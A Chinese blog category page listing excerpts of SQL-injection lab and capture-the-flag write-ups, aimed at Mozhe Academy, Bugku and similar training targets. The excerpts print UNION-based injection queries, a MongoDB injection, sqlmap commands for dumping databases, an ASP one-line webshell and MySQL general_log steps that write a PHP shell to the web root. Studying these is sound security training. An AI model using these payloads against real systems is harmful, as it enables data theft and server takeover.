
sql
文章平均质量分 58
多崎巡礼
相遇枕藉乎舟中,不知东方之既白
展开
-
墨者学院 - 零基础学习手工SQL注入
零基础学习手工SQL注入SQL注入介绍 SQL注入,其实就是用户浏览器提交的变量内容,应用程序(代码可能是asp、aspx、php、jsp等)对浏览器提交过来的数据未过滤,直接去数据库查询,导致把数据库里面其他内容(如管理账户和密码)查询返回到页面上。先看个《墨者学院故事会》的一个小故事:某个镇子里,银行保险柜做为一个公共区域帮居民存储贵重物品,为了防止错拿、多拿他人物品,银行规...转载 2018-07-26 10:39:06 · 3623 阅读 · 7 评论 -
bugku - login1(SKCTF)
关于sql的约束攻击资料可参考https://blog.youkuaiyun.com/qq_42357070/article/details/82379183本题可利用注册账户“admin 1”(admin后面空格超过预设的“n”个字符/varchar(n))即可密码自定义数据库实际写入的是admin/密码登陆即可...原创 2018-09-04 10:31:03 · 1594 阅读 · 0 评论 -
墨者学院 - SQL注入实战(防注入)-Access
使用御剑扫描,发现sqlin.asp文件,打开发现是乱码必应一下access通用防注入系统也可以知道注入信息会被记录到sqlin.asp中,这相当于一个文件上传漏洞,可以直接在sqlin.asp中写入一句话在url后面添加一句话代码and 1=<%eval request("chopper")%>,在回显的信息中发现被记录的注入信息只有and 1=,后面的一句话被过滤了...原创 2018-09-04 15:26:59 · 1590 阅读 · 0 评论 -
墨者学院 - WordPress插件漏洞分析溯源
使用wpscan扫面wordpress有漏洞的插件wpscan --url "ip" --enumerate vp 查找插件漏洞http://www.bkjia.com/xtaq/783717.html构造链接http://ip/wp-content/plugins/comment-rating/ck-processkarma.php?id=1&actio...原创 2018-08-30 11:41:10 · 2286 阅读 · 0 评论 -
墨者学院 - SQL语句利用日志写shell
outfile被禁止,或者写入文件被拦截在数据库中操作如下:(必须是root权限)1.show variables like ‘%general%'; #查看配置2.set global general_log = on; #开启general log模式3.set global general_log_file = ‘/var/www/html/1.php'; #设置日志目录为s...转载 2018-09-07 18:04:59 · 254 阅读 · 0 评论 -
墨者学院 - SQL注入漏洞测试(参数加密)
list.php御剑扫描得到 http://219.153.49.228:48291/news/list.zip解压得到源码从decode方法可知:AES的数据块长度为128位,密钥为ydhaqPQnexoaDuW3,偏移量为2018201920202021,填充为zeropadding第八行 :判断网页id后面的查询字符串值,先两次base64解密,再AES解密,删除_mo...原创 2018-09-28 11:30:17 · 2587 阅读 · 0 评论 -
墨者学院 - SQL过滤字符后手工注入漏洞测试(第1题)
一开始怎么加字符都不行,才发现应该是检测到我注入以后跳转了;(过滤了空格和一些常规查询字符,“+”号也过滤了,大小写不能绕过那就URL编码吧)和以往的套路一样,猜得到字段是4个。。。http://219.153.49.228:44375/new_list.php?id=-1/**/union/**/select/**/1,database(),version(),4url编码构造如...原创 2018-09-28 16:12:55 · 2721 阅读 · 0 评论 -
实验吧 - 因缺思汀的绕过
题目地址:http://www.shiyanbar.com/ctf/1940审计网页代码,发现有一个注释:<!--source: source.txt-->访问同目录下的source.txt发现登陆的逻辑代码,下面就可以针对它进行绕过 <?phperror_reporting(0);if (!isset($_POST['uname']) || !isset...原创 2018-10-10 14:23:39 · 275 阅读 · 0 评论 -
墨者学院 - CMS系统漏洞分析溯源(第3题)
新云网站内容管理系统是一套开源的WEB网站管理系统,采用目前非常成熟的ASP+Access/SQL开发而成。使用它,我们可以很方便的管理自己的网站,目前新云网站内容管理系统最新的版本是v4.0.0 SP2。本文要介绍的捕洞就出在新云网站内容管理系统v4.0.0 SP1以及未打官方最新补丁的v4.0.O SP2的问吧系统中。新云的问吧是类似百度知道的互动知识问答分享平台,问吧采用自己的数据库,数...原创 2018-10-29 15:56:05 · 1417 阅读 · 0 评论 -
基于约束的SQL攻击
前言值得庆幸的是如今开发者在构建网站时,已经开始注重安全问题了。绝大部分开发者都意识到SQL注入漏洞的存在,在本文我想与读者共同去探讨另一种与SQL数据库相关的漏洞,其危害与SQL注入不相上下,但却不太常见。接下来,我将为读者详细展示这种攻击手法,以及相应的防御策略。注意:本文不是讲述SQL注入攻击背景介绍最近,我遇到了一个有趣的代码片段,开发者尝试各种方法来确保数据库的安全访...转载 2018-09-04 10:14:44 · 739 阅读 · 0 评论 -
墨者学院 - SQL手工注入漏洞测试(SQLite数据库)
网站公告存在注入点 ip/new_list.php?id=1 and 1=2 union select 1,name,sql,4 from sqlite_master limit 0,1ip/new_list.php?id=1 and 1=2 union select 1,name,password,4 from WSTMart_reg ...原创 2018-08-20 17:07:53 · 1762 阅读 · 0 评论 -
墨者学院 - SQL手工注入漏洞测试(PostgreSQL数据库)
postgreSQL的注入和mysql 的注入语法是类似的,有一点小的差异:postgreSQL查询当前数据库使用:current_database()函数;在pg_stat_user_tables库查询表名,使用relname关键字;和MySQL的limit使用有差异,语法为limit 1 offset 0。 手工SQL注入过程,数据库执行的语句,是页面提交至服务器应用程序,...转载 2018-08-20 16:31:14 · 3435 阅读 · 1 评论 -
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
此题很简单,可以完全参照https://blog.youkuaiyun.com/qq_42357070/article/details/81215715进行解题以下用cms站点举例:https://pan.baidu.com/s/1uiO2cqZCGquQqyYWr0C7WQ 提交and 1=1 返回内容正常 And 1=2 返回内容为空确定存在注入漏...原创 2018-07-26 10:48:22 · 3337 阅读 · 0 评论 -
墨者学院 - SQL手工注入漏洞测试(Access数据库)
进入公告找到注入点地址输入 and 1=1 =1正常,and 1=2 出现报错说明有注入点。3.猜测存在的表,and exists (select * from admin),我这里凭借着经验猜出来是admin表,如果不是的话可以继续猜,格式为:and exists (select * from 表名),运行不报错,说明就是存在这个admin表了。4.猜测这个表里面有哪些字段:order ...原创 2018-07-26 16:10:54 · 1003 阅读 · 0 评论 -
墨者学院 - SQL手工注入漏洞测试(Sql Server数据库)
手工SQL注入过程,数据库执行的语句,是页面提交至服务器应用程序,应用程序获取id的值,然后把值拼接到查询语句中,在到数据库中查询,通过程序解析后,把结果返回在页面上,(使用时请将mozhe.cn替换成对应的靶场地址)。开启靶场环境:第1步:页面提交:http://mozhe.cn/new_list.php?id=2数据库执行语句:select * from manage w...转载 2018-07-27 16:25:35 · 6962 阅读 · 4 评论 -
sqlmap使用手册
sqlmap使用手册博客正文源出于:http://www.cnblogs.com/xishaonian/p/6031552.html0x00 SQLMAP简介: 1,sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常大的检测引擎、具有多种特性的渗透实测器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。 2,...转载 2018-08-08 16:49:58 · 383 阅读 · 0 评论 -
墨者学院 - SQL注入实战-MySQL
两种解法一、利用sqlmap及其tamper模块base64encode使用1. 看到id后面的参数可能是base64加密后的结果,我们尝试解密,解密结果为12.查看当前的系统信息sqlmap -u "http://219.153.49.228:43371/show.php?id=MQo=" --tamper=base64encode3.暴库sqlmap -u "http:/...原创 2018-08-08 17:38:47 · 2083 阅读 · 1 评论 -
SQL注入漏洞及绑定变量浅谈
1、一个问题引发的思考 大家在群里讨论了一个问题,奉文帅之命写篇作文,且看:String user_web = "user_web"String sql = "update user set user_web="+user_web+" where userid=2343"; 大家看看这条sql有没有问题,会将user_web字段 更新成什么? 问题的结论是:执行后的记录结...转载 2018-08-13 15:27:49 · 192 阅读 · 0 评论 -
墨者学院 - SQL手工注入漏洞测试(MongoDB数据库)
# 查看是否有注入点http://ip/new_list.php?id=1'# 想办法闭合语句,查看所有集合# db.getCollectionNames()返回的是数组,需要用tojson转换为字符串。并且mongodb函数区分大小写http://ip/new_list.php?id=1'}); return ({title:tojson(db.getCollectionNames()...原创 2018-08-16 16:33:58 · 2122 阅读 · 0 评论 -
墨者学院 - SQL注入漏洞测试(POST)
此题和最开始拿到sql注入不一样,注入点不再是公告了,二是登陆页面的账号栏,简单的语句就能得到错误回显根据题目提示,post请求1)随便输入用户名和密码,然后使用 burp抓取登录界面的post包,保存为txt;2)将txt放在sqlmap目录下;3)打开sqlmap,使用post注入;sqlmap.py -r 文件路径/文件名 --dbs //证明可以注入,且获取所有数据库名...原创 2018-08-20 12:30:23 · 5472 阅读 · 0 评论 -
OWASP Juice Shop 实战报告与解析
OWASP Juice Shop 实战报告与解析安装教程1.1 Admin Section1.2 confidential document1.3 Error Handing(错误的登录框)1.7 XSS Tier 12.5安装教程按照github项目的流程结果18.04ubuntu 在第四部编译一直报错npm ERR! fetch failed https://registry.npmj...原创 2018-11-01 11:31:05 · 3386 阅读 · 0 评论